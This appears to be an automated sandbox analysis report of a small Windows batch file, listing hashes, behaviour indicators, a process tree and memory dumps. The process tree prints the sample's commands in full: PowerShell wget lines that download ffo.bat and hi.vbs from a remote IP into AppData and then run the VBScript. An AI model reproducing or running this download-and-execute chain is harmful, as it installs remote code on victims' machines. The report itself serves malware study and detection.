1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 18:29

Target

4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Size

191B
MD5

4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1

07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256

1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
SHA512

dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc

Score

1^/10

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2448	powershell.exe
1300	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 2448	2000	cmd.exe	31
PID 2000 wrote to memory of 2448	2000	cmd.exe	31
PID 2000 wrote to memory of 2448	2000	cmd.exe	31
PID 2000 wrote to memory of 1300	2000	cmd.exe	32
PID 2000 wrote to memory of 1300	2000	cmd.exe	32
PID 2000 wrote to memory of 1300	2000	cmd.exe	32
PID 2000 wrote to memory of 2748	2000	cmd.exe	33
PID 2000 wrote to memory of 2748	2000	cmd.exe	33
PID 2000 wrote to memory of 2748	2000	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\4d8b2d19bdd29e6d89e0769cff9b0b48.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  PID:2748

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a3dad218a975d88b1c20ce0bb6f90d7b

SHA1
890edb9063e0cbf34f76f75a77f93460cbfed008

SHA256
f2a9cb4722c13c8489e9307391ba25302c718ec5448f0c8a9fbbbb4a99f0f094

SHA512
fbf72072a2b934023145bf3885b649aeb3c1eaeeed21570fa5dd3f62db3f3e8e0b1177d838c6b9612267f4bdd6c457e9a82d2d284d8b80f328ecacd28d6b03cf

Download Submit
memory/1300-17-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/1300-18-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2448-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

Filesize
4KB

Download
memory/2448-5-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2448-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2448-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/2448-8-0x0000000002A84000-0x0000000002A87000-memory.dmp

Filesize
12KB

Download
memory/2448-9-0x0000000002A8B000-0x0000000002AF2000-memory.dmp

Filesize
412KB

Download
memory/2448-11-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download
memory/2448-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

Filesize
9.6MB

Download